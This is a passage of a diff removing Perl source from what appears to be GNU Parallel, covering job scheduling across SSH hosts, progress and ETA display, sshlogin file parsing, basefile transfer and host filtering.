-    my $file = shift;
-    if($file eq "-") {
-	$Global::stdin_in_opt_a = 1;
-	return ($Global::original_stdin || *STDIN);
-    }
-    if(ref $file eq "GLOB") {
-	# This is an open filehandle
-	return $file;
-    }
-    my $fh = gensym;
-    if(not open($fh, "<", $file)) {
-        ::error("Cannot open input file `$file': No such file or directory.\n");
-        wait_and_exit(255);
-    }
-    return $fh;
-}
-
-sub __RUNNING_THE_JOBS_AND_PRINTING_PROGRESS__ {}
-
-# Variable structure:
-#
-#    $Global::running{$pid} = Pointer to Job-object
-#    @Global::virgin_jobs = Pointer to Job-object that have received no input
-#    $Global::host{$sshlogin} = Pointer to SSHLogin-object
-#    $Global::total_running = total number of running jobs
-#    $Global::total_started = total jobs started
-
-sub init_run_jobs {
-    $Global::total_running = 0;
-    $Global::total_started = 0;
-    $Global::tty_taken = 0;
-    $SIG{USR1} = \&list_running_jobs;
-    $SIG{USR2} = \&toggle_progress;
-    if(@opt::basefile) { setup_basefile(); }
-}
-
-{
-    my $last_time;
-    my %last_mtime;
-
-sub start_more_jobs {
-    # Run start_another_job() but only if:
-    #   * not $Global::start_no_new_jobs set
-    #   * not JobQueue is empty
-    #   * not load on server is too high
-    #   * not server swapping
-    #   * not too short time since last remote login
-    # Uses:
-    #   $Global::max_procs_file
-    #   $Global::max_procs_file_last_mod
-    #   %Global::host
-    #   @opt::sshloginfile
-    #   $Global::start_no_new_jobs
-    #   $opt::filter_hosts
-    #   $Global::JobQueue
-    #   $opt::pipe
-    #   $opt::load
-    #   $opt::noswap
-    #   $opt::delay
-    #   $Global::newest_starttime
-    # Returns:
-    #   $jobs_started = number of jobs started
-    my $jobs_started = 0;
-    my $jobs_started_this_round = 0;
-    if($Global::start_no_new_jobs) {
-	return $jobs_started;
-    }
-    if(time - ($last_time||0) > 1) {
-	# At most do this every second
-	$last_time = time;
-	if($Global::max_procs_file) {
-	    # --jobs filename
-	    my $mtime = (stat($Global::max_procs_file))[9];
-	    if($mtime > $Global::max_procs_file_last_mod) {
-		# file changed: Force re-computing max_jobs_running
-		$Global::max_procs_file_last_mod = $mtime;
-		for my $sshlogin (values %Global::host) {
-		    $sshlogin->set_max_jobs_running(undef);
-		}
-	    }
-	}
-	if(@opt::sshloginfile) {
-	    # Is --sshloginfile changed?
-	    for my $slf (@opt::sshloginfile) {
-		my $actual_file = expand_slf_shorthand($slf);
-		my $mtime = (stat($actual_file))[9];
-		$last_mtime{$actual_file} ||= $mtime;
-		if($mtime - $last_mtime{$actual_file} > 1) {
-		    ::debug("run","--sshloginfile $actual_file changed. reload\n");
-		    $last_mtime{$actual_file} = $mtime;
-		    # Reload $slf
-		    # Empty sshlogins
-		    @Global::sshlogin = ();
-		    for (values %Global::host) {
-			# Don't start new jobs on any host
-			# except the ones added back later
-			$_->set_max_jobs_running(0);
-		    }
-		    # This will set max_jobs_running on the SSHlogins
-		    read_sshloginfile($actual_file);
-		    parse_sshlogin();
-		    $opt::filter_hosts and filter_hosts();
-		    setup_basefile();
-		}
-	    }
-	}
-    }
-    do {
-	$jobs_started_this_round = 0;
-	# This will start 1 job on each --sshlogin (if possible)
-	# thus distribute the jobs on the --sshlogins round robin
-
-	for my $sshlogin (values %Global::host) {
-	    if($Global::JobQueue->empty() and not $opt::pipe) {
-		# No more jobs in the queue
-		last;
-	    }
-	    debug("run", "Running jobs before on ", $sshlogin->string(), ": ",
-		  $sshlogin->jobs_running(), "\n");
-	    if ($sshlogin->jobs_running() < $sshlogin->max_jobs_running()) {
-		if($opt::load and $sshlogin->loadavg_too_high()) {
-		    # The load is too high or unknown
-		    next;
-		}
-		if($opt::noswap and $sshlogin->swapping()) {
-		    # The server is swapping
-		    next;
-		}
-		if($sshlogin->too_fast_remote_login()) {
-		    # It has been too short since
-		    next;
-		}
-		if($opt::delay and $opt::delay > ::now() - $Global::newest_starttime) {
-		    # It has been too short since last start
-		    next;
-		}
-		debug("run", $sshlogin->string(), " has ", $sshlogin->jobs_running(),
-		      " out of ", $sshlogin->max_jobs_running(),
-		      " jobs running. Start another.\n");
-		if(start_another_job($sshlogin) == 0) {
-		    # No more jobs to start on this $sshlogin
-		    debug("run","No jobs started on ", $sshlogin->string(), "\n");
-		    next;
-		}
-		$sshlogin->inc_jobs_running();
-		$sshlogin->set_last_login_at(::now());
-		$jobs_started++;
-		$jobs_started_this_round++;
-	    }
-	    debug("run","Running jobs after on ", $sshlogin->string(), ": ",
-		  $sshlogin->jobs_running(), " of ",
-		  $sshlogin->max_jobs_running(), "\n");
-	}
-    } while($jobs_started_this_round);
-
-    return $jobs_started;
-}
-}
-
-{
-    my $no_more_file_handles_warned;
-
-sub start_another_job {
-    # If there are enough filehandles
-    #   and JobQueue not empty
-    #   and not $job is in joblog
-    # Then grab a job from Global::JobQueue,
-    #   start it at sshlogin
-    #   mark it as virgin_job
-    # Inputs:
-    #   $sshlogin = the SSHLogin to start the job on
-    # Uses:
-    #   $Global::JobQueue
-    #   $opt::pipe
-    #   $opt::results
-    #   $opt::resume
-    #   @Global::virgin_jobs
-    # Returns:
-    #   1 if another jobs was started
-    #   0 otherwise
-    my $sshlogin = shift;
-    # Do we have enough file handles to start another job?
-    if(enough_file_handles()) {
-        if($Global::JobQueue->empty() and not $opt::pipe) {
-            # No more commands to run
-	    debug("start", "Not starting: JobQueue empty\n");
-	    return 0;
-        } else {
-            my $job;
-	    # Skip jobs already in job log
-	    # Skip jobs already in results
-            do {
-		$job = get_job_with_sshlogin($sshlogin);
-		if(not defined $job) {
-		    # No command available for that sshlogin
-		    debug("start", "Not starting: no jobs available for ",
-			  $sshlogin->string(), "\n");
-		    return 0;
-		}
-	    } while ($job->is_already_in_joblog()
-		     or
-		     ($opt::results and $opt::resume and $job->is_already_in_results()));
-	    debug("start", "Command to run on '", $job->sshlogin()->string(), "': '",
-		  $job->replaced(),"'\n");
-            if($job->start()) {
-		if($opt::pipe) {
-		    push(@Global::virgin_jobs,$job);
-		}
-                debug("start", "Started as seq ", $job->seq(),
-		      " pid:", $job->pid(), "\n");
-                return 1;
-            } else {
-                # Not enough processes to run the job.
-		# Put it back on the queue.
-		$Global::JobQueue->unget($job);
-		# Count down the number of jobs to run for this SSHLogin.
-		my $max = $sshlogin->max_jobs_running();
-		if($max > 1) { $max--; } else {
-		    ::error("No more processes: cannot run a single job. Something is wrong.\n");
-		    ::wait_and_exit(255);
-		}
-		$sshlogin->set_max_jobs_running($max);
-		# Sleep up to 300 ms to give other processes time to die
-		::usleep(rand()*300);
-		::warning("No more processes: ",
-			  "Decreasing number of running jobs to $max. ",
-			  "Raising ulimit -u or /etc/security/limits.conf may help.\n");
-		return 0;
-            }
-        }
-    } else {
-        # No more file handles
-	$no_more_file_handles_warned++ or
-	    ::warning("No more file handles. ",
-		      "Raising ulimit -n or /etc/security/limits.conf may help.\n");
-        return 0;
-    }
-}
-}
-
-sub init_progress {
-    # Uses:
-    #   $opt::bar
-    # Returns:
-    #   list of computers for progress output
-    $|=1;
-    if($opt::bar) {
-	return("","");
-    }
-    my %progress = progress();
-    return ("\nComputers / CPU cores / Max jobs to run\n",
-            $progress{'workerlist'});
-}
-
-sub drain_job_queue {
-    # Uses:
-    #   $opt::progress
-    #   $Global::original_stderr
-    #   $Global::total_running
-    #   $Global::max_jobs_running
-    #   %Global::running
-    #   $Global::JobQueue
-    #   %Global::host
-    #   $Global::start_no_new_jobs
-    # Returns: N/A
-    if($opt::progress) {
-        print $Global::original_stderr init_progress();
-    }
-    my $last_header="";
-    my $sleep = 0.2;
-    do {
-        while($Global::total_running > 0) {
-            debug($Global::total_running, "==", scalar
-		  keys %Global::running," slots: ", $Global::max_jobs_running);
-	    if($opt::pipe) {
-		# When using --pipe sometimes file handles are not closed properly
-		for my $job (values %Global::running) {
-		    close $job->fh(0,"w");
-		}
-	    }
-            if($opt::progress) {
-                my %progress = progress();
-                if($last_header ne $progress{'header'}) {
-                    print $Global::original_stderr "\n", $progress{'header'}, "\n";
-                    $last_header = $progress{'header'};
-                }
-                print $Global::original_stderr "\r",$progress{'status'};
-		flush $Global::original_stderr;
-            }
-	    if($Global::total_running < $Global::max_jobs_running
-	       and not $Global::JobQueue->empty()) {
-		# These jobs may not be started because of loadavg
-		# or too little time between each ssh login.
-		if(start_more_jobs() > 0) {
-		    # Exponential back-on if jobs were started
-		    $sleep = $sleep/2+0.001;
-		}
-	    }
-            # Sometimes SIGCHLD is not registered, so force reaper
-	    $sleep = ::reap_usleep($sleep);
-        }
-        if(not $Global::JobQueue->empty()) {
-	    # These jobs may not be started:
-	    # * because there the --filter-hosts has removed all
-	    if(not %Global::host) {
-		::error("There are no hosts left to run on.\n");
-		::wait_and_exit(255);
-	    }
-	    # * because of loadavg
-	    # * because of too little time between each ssh login.
-            start_more_jobs();
-	    $sleep = ::reap_usleep($sleep);
-	    if($Global::max_jobs_running == 0) {
-		::warning("There are no job slots available. Increase --jobs.\n");
-	    }
-        }
-    } while ($Global::total_running > 0
-	     or
-	     not $Global::start_no_new_jobs and not $Global::JobQueue->empty());
-    if($opt::progress) {
-	my %progress = progress();
-	print $Global::original_stderr "\r", $progress{'status'}, "\n";
-	flush $Global::original_stderr;
-    }
-}
-
-sub toggle_progress {
-    # Turn on/off progress view
-    # Uses:
-    #   $opt::progress
-    #   $Global::original_stderr
-    # Returns: N/A
-    $opt::progress = not $opt::progress;
-    if($opt::progress) {
-        print $Global::original_stderr init_progress();
-    }
-}
-
-sub progress {
-    # Uses:
-    #   $opt::bar
-    #   $opt::eta
-    #   %Global::host
-    #   $Global::total_started
-    # Returns:
-    #   $workerlist = list of workers
-    #   $header = that will fit on the screen
-    #   $status = message that will fit on the screen
-    if($opt::bar) {
-	return ("workerlist" => "", "header" => "", "status" => bar());
-    }
-    my $eta = "";
-    my ($status,$header)=("","");
-    if($opt::eta) {
-	my($total, $completed, $left, $pctcomplete, $avgtime, $this_eta) =
-	    compute_eta();
-	$eta = sprintf("ETA: %ds Left: %d AVG: %.2fs  ",
-		       $this_eta, $left, $avgtime);
-    }
-    my $termcols = terminal_columns();
-    my @workers = sort keys %Global::host;
-    my %sshlogin = map { $_ eq ":" ? ($_=>"local") : ($_=>$_) } @workers;
-    my $workerno = 1;
-    my %workerno = map { ($_=>$workerno++) } @workers;
-    my $workerlist = "";
-    for my $w (@workers) {
-        $workerlist .=
-        $workerno{$w}.":".$sshlogin{$w} ." / ".
-            ($Global::host{$w}->ncpus() || "-")." / ".
-            $Global::host{$w}->max_jobs_running()."\n";
-    }
-    $status = "x"x($termcols+1);
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX/XX%/XX.Xs sshlogin2:XX/XX/XX%/XX.Xs sshlogin3:XX/XX/XX%/XX.Xs
-        $header = "Computer:jobs running/jobs completed/%of started jobs/Average seconds to complete";
-        $status = $eta .
-            join(" ",map
-                 {
-                     if($Global::total_started) {
-                         my $completed = ($Global::host{$_}->jobs_completed()||0);
-                         my $running = $Global::host{$_}->jobs_running();
-                         my $time = $completed ? (time-$^T)/($completed) : "0";
-                         sprintf("%s:%d/%d/%d%%/%.1fs ",
-                                 $sshlogin{$_}, $running, $completed,
-                                 ($running+$completed)*100
-                                 / $Global::total_started, $time);
-                     }
-                 } @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX/XX/XX%/XX.Xs 2:XX/XX/XX%/XX.Xs 3:XX/XX/XX%/XX.Xs 4:XX/XX/XX%/XX.Xs
-        $header = "Computer:jobs running/jobs completed/%of started jobs";
-        $status = $eta .
-            join(" ",map
-                 {
-                     my $completed = ($Global::host{$_}->jobs_completed()||0);
-                     my $running = $Global::host{$_}->jobs_running();
-                     my $time = $completed ? (time-$^T)/($completed) : "0";
-                     sprintf("%s:%d/%d/%d%%/%.1fs ",
-                             $workerno{$_}, $running, $completed,
-                             ($running+$completed)*100
-                             / $Global::total_started, $time);
-                 } @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX/XX% sshlogin2:XX/XX/XX% sshlogin3:XX/XX/XX%
-        $header = "Computer:jobs running/jobs completed/%of started jobs";
-        $status = $eta .
-            join(" ",map
-                 { sprintf("%s:%d/%d/%d%%",
-                           $sshlogin{$_},
-                           $Global::host{$_}->jobs_running(),
-                           ($Global::host{$_}->jobs_completed()||0),
-                           ($Global::host{$_}->jobs_running()+
-                            ($Global::host{$_}->jobs_completed()||0))*100
-                           / $Global::total_started) }
-                 @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX/XX/XX% 2:XX/XX/XX% 3:XX/XX/XX% 4:XX/XX/XX% 5:XX/XX/XX% 6:XX/XX/XX%
-        $header = "Computer:jobs running/jobs completed/%of started jobs";
-        $status = $eta .
-            join(" ",map
-                 { sprintf("%s:%d/%d/%d%%",
-                           $workerno{$_},
-                           $Global::host{$_}->jobs_running(),
-                           ($Global::host{$_}->jobs_completed()||0),
-                           ($Global::host{$_}->jobs_running()+
-                            ($Global::host{$_}->jobs_completed()||0))*100
-                           / $Global::total_started) }
-                 @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX/XX% sshlogin2:XX/XX/XX% sshlogin3:XX/XX sshlogin4:XX/XX
-        $header = "Computer:jobs running/jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d/%d",
-                                 $sshlogin{$_}, $Global::host{$_}->jobs_running(),
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX/XX sshlogin2:XX/XX sshlogin3:XX/XX sshlogin4:XX/XX
-        $header = "Computer:jobs running/jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d/%d",
-                                 $sshlogin{$_}, $Global::host{$_}->jobs_running(),
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX/XX 2:XX/XX 3:XX/XX 4:XX/XX 5:XX/XX 6:XX/XX
-        $header = "Computer:jobs running/jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d/%d",
-                                 $workerno{$_}, $Global::host{$_}->jobs_running(),
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # sshlogin1:XX sshlogin2:XX sshlogin3:XX sshlogin4:XX sshlogin5:XX
-        $header = "Computer:jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d",
-                                 $sshlogin{$_},
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    if(length $status > $termcols) {
-        # 1:XX 2:XX 3:XX 4:XX 5:XX 6:XX
-        $header = "Computer:jobs completed";
-        $status = $eta .
-            join(" ",map
-                       { sprintf("%s:%d",
-                                 $workerno{$_},
-                                 ($Global::host{$_}->jobs_completed()||0)) }
-                       @workers);
-    }
-    return ("workerlist" => $workerlist, "header" => $header, "status" => $status);
-}
-
-{
-    my ($total, $first_completed, $smoothed_avg_time);
-
-    sub compute_eta {
-	# Calculate important numbers for ETA
-	# Returns:
-	#   $total = number of jobs in total
-	#   $completed = number of jobs completed
-	#   $left = number of jobs left
-	#   $pctcomplete = percent of jobs completed
-	#   $avgtime = averaged time
-	#   $eta = smoothed eta
-	$total ||= $Global::JobQueue->total_jobs();
-	my $completed = 0;
-        for(values %Global::host) { $completed += $_->jobs_completed() }
-	my $left = $total - $completed;
-	if(not $completed) {
-	    return($total, $completed, $left, 0, 0, 0);
-	}
-	my $pctcomplete = $completed / $total;
-	$first_completed ||= time;
-	my $timepassed = (time - $first_completed);
-	my $avgtime = $timepassed / $completed;
-	$smoothed_avg_time ||= $avgtime;
-	# Smooth the eta so it does not jump wildly
-	$smoothed_avg_time = (1 - $pctcomplete) * $smoothed_avg_time +
-	    $pctcomplete * $avgtime;
-	my $eta = int($left * $smoothed_avg_time);
-	return($total, $completed, $left, $pctcomplete, $avgtime, $eta);
-    }
-}
-
-{
-    my ($rev,$reset);
-
-    sub bar {
-	# Return:
-	#   $status = bar with eta, completed jobs, arg and pct
-	$rev ||= "\033[7m";
-	$reset ||= "\033[0m";
-	my($total, $completed, $left, $pctcomplete, $avgtime, $eta) =
-	    compute_eta();
-	my $arg = $Global::newest_job ?
-	    $Global::newest_job->{'commandline'}->replace_placeholders(["\257<\257>"],0,0) : "";
-	# These chars mess up display in the terminal
-	$arg =~ tr/[\011-\016\033\302-\365]//d;
-	my $bar_text =
-	    sprintf("%d%% %d:%d=%ds %s",
-		    $pctcomplete*100, $completed, $left, $eta, $arg);
-	my $terminal_width = terminal_columns();
-	my $s = sprintf("%-${terminal_width}s",
-			substr($bar_text." "x$terminal_width,
-			       0,$terminal_width));
-	my $width = int($terminal_width * $pctcomplete);
-	substr($s,$width,0) = $reset;
-	my $zenity = sprintf("%-${terminal_width}s",
-			     substr("#   $eta sec $arg",
-				    0,$terminal_width));
-	$s = "\r" . $zenity . "\r" . $pctcomplete*100 . # Prefix with zenity header
-	    "\r" . $rev . $s . $reset;
-	return $s;
-    }
-}
-
-{
-    my ($columns,$last_column_time);
-
-    sub terminal_columns {
-	# Get the number of columns of the display
-	# Returns:
-	#   number of columns of the screen
-	if(not $columns or $last_column_time < time) {
-	    $last_column_time = time;
-	    $columns = $ENV{'COLUMNS'};
-	    if(not $columns) {
-		my $resize = qx{ resize 2>/dev/null };
-		$resize =~ /COLUMNS=(\d+);/ and do { $columns = $1; };
-	    }
-	    $columns ||= 80;
-	}
-	return $columns;
-    }
-}
-
-sub get_job_with_sshlogin {
-    # Returns:
-    #   next job object for $sshlogin if any available
-    my $sshlogin = shift;
-    my $job = undef;
-
-    if ($opt::hostgroups) {
-	my @other_hostgroup_jobs = ();
-
-        while($job = $Global::JobQueue->get()) {
-	    if($sshlogin->in_hostgroups($job->hostgroups())) {
-		# Found a job for this hostgroup
-		last;
-	    } else {
-		# This job was not in the hostgroups of $sshlogin
-                push @other_hostgroup_jobs, $job;
-            }
-        }
-	$Global::JobQueue->unget(@other_hostgroup_jobs);
-	if(not defined $job) {
-	    # No more jobs
-	    return undef;
-	}
-    } else {
-        $job = $Global::JobQueue->get();
-        if(not defined $job) {
-            # No more jobs
-	    ::debug("start", "No more jobs: JobQueue empty\n");
-            return undef;
-        }
-    }
-
-    my $clean_command = $job->replaced();
-    if($clean_command =~ /^\s*$/) {
-        # Do not run empty lines
-        if(not $Global::JobQueue->empty()) {
-            return get_job_with_sshlogin($sshlogin);
-        } else {
-            return undef;
-        }
-    }
-    $job->set_sshlogin($sshlogin);
-    if($opt::retries and $clean_command and
-       $job->failed_here()) {
-        # This command with these args failed for this sshlogin
-        my ($no_of_failed_sshlogins,$min_failures) = $job->min_failed();
-	# Only look at the Global::host that have > 0 jobslots
-        if($no_of_failed_sshlogins == grep { $_->max_jobs_running() > 0 } values %Global::host
-	   and $job->failed_here() == $min_failures) {
-            # It failed the same or more times on another host:
-            # run it on this host
-        } else {
-            # If it failed fewer times on another host:
-            # Find another job to run
-            my $nextjob;
-            if(not $Global::JobQueue->empty()) {
-		# This can potentially recurse for all args
-                no warnings 'recursion';
-                $nextjob = get_job_with_sshlogin($sshlogin);
-            }
-            # Push the command back on the queue
-            $Global::JobQueue->unget($job);
-            return $nextjob;
-        }
-    }
-    return $job;
-}
-
-sub __REMOTE_SSH__ {}
-
-sub read_sshloginfiles {
-    # Returns: N/A
-    for my $s (@_) {
-	read_sshloginfile(expand_slf_shorthand($s));
-    }
-}
-
-sub expand_slf_shorthand {
-    my $file = shift;
-    if($file eq "-") {
-	# skip: It is stdin
-    } elsif($file eq "..") {
-        $file = $ENV{'HOME'}."/.parallel/sshloginfile";
-    } elsif($file eq ".") {
-        $file = "/etc/parallel/sshloginfile";
-    } elsif(not -r $file) {
-	if(not -r $ENV{'HOME'}."/.parallel/".$file) {
-		# Try prepending ~/.parallel
-		::error("Cannot open $file.\n");
-		::wait_and_exit(255);
-	} else {
-	    $file = $ENV{'HOME'}."/.parallel/".$file;
-	}
-    }
-    return $file;
-}
-
-sub read_sshloginfile {
-    # Returns: N/A
-    my $file = shift;
-    my $close = 1;
-    my $in_fh;
-    ::debug("init","--slf ",$file);
-    if($file eq "-") {
-	$in_fh = *STDIN;
-	$close = 0;
-    } else {
-	if(not open($in_fh, "<", $file)) {
-	    # Try the filename
-	    ::error("Cannot open $file.\n");
-	    ::wait_and_exit(255);
-	}
-    }
-    while(<$in_fh>) {
-        chomp;
-        /^\s*#/ and next;
-        /^\s*$/ and next;
-        push @Global::sshlogin, $_;
-    }
-    if($close) {
-	close $in_fh;
-    }
-}
-
-sub parse_sshlogin {
-    # Returns: N/A
-    my @login;
-    if(not @Global::sshlogin) { @Global::sshlogin = (":"); }
-    for my $sshlogin (@Global::sshlogin) {
-        # Split up -S sshlogin,sshlogin
-        for my $s (split /,/, $sshlogin) {
-            if ($s eq ".." or $s eq "-") {
-		# This may add to @Global::sshlogin - possibly bug
-		read_sshloginfile(expand_slf_shorthand($s));
-            } else {
-                push (@login, $s);
-            }
-        }
-    }
-    $Global::minimal_command_line_length = 8_000_000;
-    my @allowed_hostgroups;
-    for my $ncpu_sshlogin_string (::uniq(@login)) {
-	my $sshlogin = SSHLogin->new($ncpu_sshlogin_string);
-	my $sshlogin_string = $sshlogin->string();
-	if($sshlogin_string eq "") {
-	    # This is an ssh group: -S @webservers
-	    push @allowed_hostgroups, $sshlogin->hostgroups();
-	    next;
-	}
-	if($Global::host{$sshlogin_string}) {
-	    # This sshlogin has already been added:
-	    # It is probably a host that has come back
-	    # Set the max_jobs_running back to the original
-	    debug("run","Already seen $sshlogin_string\n");
-	    if($sshlogin->{'ncpus'}) {
-		# If ncpus set by '#/' of the sshlogin, overwrite it:
-		$Global::host{$sshlogin_string}->set_ncpus($sshlogin->ncpus());
-	    }
-	    $Global::host{$sshlogin_string}->set_max_jobs_running(undef);
-	    next;
-	}
-	if($sshlogin_string eq ":") {
-	    $sshlogin->set_maxlength(Limits::Command::max_length());
-	} else {
-	    # If all chars needs to be quoted, every other character will be \
-	    $sshlogin->set_maxlength(int(Limits::Command::max_length()/2));
-	}
-	$Global::minimal_command_line_length =
-	    ::min($Global::minimal_command_line_length, $sshlogin->maxlength());
-        $Global::host{$sshlogin_string} = $sshlogin;
-    }
-    if(@allowed_hostgroups) {
-	# Remove hosts that are not in these groups
-	while (my ($string, $sshlogin) = each %Global::host) {
-	    if(not $sshlogin->in_hostgroups(@allowed_hostgroups)) {
-		delete $Global::host{$string};
-	    }
-	}
-    }
-
-    # debug("start", "sshlogin: ", my_dump(%Global::host),"\n");
-    if($opt::transfer or @opt::return or $opt::cleanup or @opt::basefile) {
-        if(not remote_hosts()) {
-            # There are no remote hosts
-            if(@opt::trc) {
-		::warning("--trc ignored as there are no remote --sshlogin.\n");
-            } elsif (defined $opt::transfer) {
-		::warning("--transfer ignored as there are no remote --sshlogin.\n");
-            } elsif (@opt::return) {
-                ::warning("--return ignored as there are no remote --sshlogin.\n");
-            } elsif (defined $opt::cleanup) {
-		::warning("--cleanup ignored as there are no remote --sshlogin.\n");
-            } elsif (@opt::basefile) {
-                ::warning("--basefile ignored as there are no remote --sshlogin.\n");
-            }
-        }
-    }
-}
-
-sub remote_hosts {
-    # Return sshlogins that are not ':'
-    # Returns:
-    #   list of sshlogins with ':' removed
-    return grep !/^:$/, keys %Global::host;
-}
-
-sub setup_basefile {
-    # Transfer basefiles to each $sshlogin
-    # This needs to be done before first jobs on $sshlogin is run
-    # Returns: N/A
-    my $cmd = "";
-    my $rsync_destdir;
-    my $workdir;
-    for my $sshlogin (values %Global::host) {
-      if($sshlogin->string() eq ":") { next }
-      for my $file (@opt::basefile) {
-	if($file !~ m:^/: and $opt::workdir eq "...") {
-	  ::error("Work dir '...' will not work with relative basefiles\n");
-	  ::wait_and_exit(255);
-	}
-	$workdir ||= Job->new("")->workdir();
-	$cmd .= $sshlogin->rsync_transfer_cmd($file,$workdir) . "&";
-      }
-    }
-    $cmd .= "wait;";
-    debug("init", "basesetup: $cmd\n");
-    print `$cmd`;
-}
-
-sub cleanup_basefile {
-    # Remove the basefiles transferred
-    # Returns: N/A
-    my $cmd="";
-    my $workdir = Job->new("")->workdir();
-    for my $sshlogin (values %Global::host) {
-        if($sshlogin->string() eq ":") { next }
-        for my $file (@opt::basefile) {
-	  $cmd .= $sshlogin->cleanup_cmd($file,$workdir)."&";
-        }
-    }
-    $cmd .= "wait;";
-    debug("init", "basecleanup: $cmd\n");
-    print `$cmd`;
-}
-
-sub filter_hosts {
-    my(@cores, @cpus, @maxline, @echo);
-    my $envvar = ::shell_quote_scalar($Global::envvar);
-    while (my ($host, $sshlogin) = each %Global::host) {
-	if($host eq ":") { next }
-	# The 'true' is used to get the $host out later
-	my $sshcmd = "true $host;" . $sshlogin->sshcommand()." ".$sshlogin->serverlogin();
-	push(@cores, $host."\t".$sshcmd." ".$envvar." parallel --number-of-cores\n\0");
-	push(@cpus, $host."\t".$sshcmd." ".$envvar." parallel --number-of-cpus\n\0");
-	push(@maxline, $host."\t".$sshcmd." ".$envvar." parallel --max-line-length-allowed\n\0");
-	# 'echo' is used to get the best possible value for an ssh login time
-	push(@echo, $host."\t".$sshcmd." echo\n\0");
-    }
-    my ($fh, $tmpfile) = ::tmpfile(SUFFIX => ".ssh");
-    print $fh @cores, @cpus, @maxline, @echo;
-    close $fh;
-    # --timeout 5: Setting up an SSH connection and running a simple
-    #              command should never take > 5 sec.
-    # --delay 0.1: If multiple sshlogins use the same proxy the delay
-    #              will make it less likely to overload the ssh daemon.
-    # --retries 3: If the ssh daemon it overloaded, try 3 times
-    # -s 16000: Half of the max line on UnixWare
-    my $cmd = "cat $tmpfile | $0 -j0 --timeout 5 -s 16000 --joblog - --plain --delay 0.1 --retries 3 --tag --tagstring {1} -0 --colsep '\t' -k eval {2} 2>/dev/null";
-    ::debug("init", $cmd, "\n");
-    open(my $host_fh, "-|", $cmd) || ::die_bug("parallel host check: $cmd");
-    my (%ncores, %ncpus, %time_to_login, %maxlen, %echo, @down_hosts);
-    my $prepend = "";
-    while(<$host_fh>) {
-	if(/\'$/) {
-	    # if last char = ' then append next line
-	    # This may be due to quoting of $Global::envvar
-	    $prepend .= $_;
-	    next;
-	}
-	$_ = $prepend . $_;
-	$prepend = "";
-	chomp;
-	my @col = split /\t/, $_;
-	if(defined $col[6]) {
-	    # This is a line from --joblog
-	    # seq host time spent sent received exit signal command
-	    # 2 : 1372607672.654 0.675 0 0 0 0 eval true\ m\;ssh\ m\ parallel\ --number-of-cores
-	    if($col[0] eq "Seq" and $col[1] eq "Host" and
-		    $col[2] eq "Starttime") {
-		# Header => skip
-		next;
-	    }
-	    # Get server from: eval true server\;
-	    $col[8] =~ /eval true..([^;]+).;/ or ::die_bug("col8 does not contain host: $col[8]");
-	    my $host = $1;
-	    $host =~ tr/\\//d;
-	    $Global::host{$host} or next;
-	    if($col[6] eq "255" or $col[7] eq "15") {
-		# exit == 255 or signal == 15: ssh failed
-		# Remove sshlogin
-		::debug("init", "--filtered $host\n");
-		push(@down_hosts, $host);
-		@down_hosts = uniq(@down_hosts);
-	    } elsif($col[6] eq "127") {
-		# signal == 127: parallel not installed remote
-		# Set ncpus and ncores = 1
-		::warning("Could not figure out ",
-			  "number of cpus on $host. Using 1.\n");
-		$ncores{$host} = 1;
-		$ncpus{$host} = 1;
-		$maxlen{$host} = Limits::Command::max_length();
-	    } elsif($col[0] =~ /^\d+$/ and $Global::host{$host}) {
-		# Remember how log it took to log in
-		# 2 : 1372607672.654 0.675 0 0 0 0 eval true\ m\;ssh\ m\ echo
-		$time_to_login{$host} = ::min($time_to_login{$host},$col[3]);
-	    } else {
-		::die_bug("host check unmatched long jobline: $_");
-	    }
-	} elsif($Global::host{$col[0]}) {
-	    # This output from --number-of-cores, --number-of-cpus,
-	    # --max-line-length-allowed
-	    # ncores: server       8
-	    # ncpus:  server       2
-	    # maxlen: server       131071
-	    if(not $ncores{$col[0]}) {
-		$ncores{$col[0]} = $col[1];
-	    } elsif(not $ncpus{$col[0]}) {
-		$ncpus{$col[0]} = $col[1];
-	    } elsif(not $maxlen{$col[0]}) {
-		$maxlen{$col[0]} = $col[1];
-	    } elsif(not $echo{$col[0]}) {
-		$echo{$col[0]} = $col[1];
-	    } elsif(m/perl: warning:|LANGUAGE =|LC_ALL =|LANG =|are supported and installed/) {
-		# Skip these:
-		# perl: warning: Setting locale failed.
-		# perl: warning: Please check that your locale settings:
-		#         LANGUAGE = (unset),
-		#         LC_ALL = (unset),
-		#         LANG = "en_US.UTF-8"
-		#     are supported and installed on your system.
-		# perl: warning: Falling back to the standard locale ("C").
-	    } else {
-		::die_bug("host check too many col0: $_");
-	    }
-	} else {
-	    ::die_bug("host check unmatched short jobline ($col[0]): $_");
-	}
-    }
-    close $host_fh;
-    $Global::debug or unlink $tmpfile;
-    delete @Global::host{@down_hosts};
-    @down_hosts and ::warning("Removed @down_hosts\n");
-    $Global::minimal_command_line_length = 8_000_000;
-    while (my ($sshlogin, $obj) = each %Global::host) {
-	if($sshlogin eq ":") { next }
-	$ncpus{$sshlogin} or ::die_bug("ncpus missing: ".$obj->serverlogin());
-	$ncores{$sshlogin} or ::die_bug("ncores missing: ".$obj->serverlogin());
-	$time_to_login{$sshlogin} or ::die_bug("time_to_login missing: ".$obj->serverlogin());
-	$maxlen{$sshlogin} or ::die_bug("maxlen missing: ".$obj->serverlogin());
-	if($opt::use_cpus_instead_of_cores) {
-	    $obj->set_ncpus($ncpus{$sshlogin});
-	} else {
-	    $obj->set_ncpus($ncores{$sshlogin});
-	}
-	$obj->set_time_to_login($time_to_login{$sshlogin});
-        $obj->set_maxlength($maxlen{$sshlogin});
-	$Global::minimal_command_line_length =
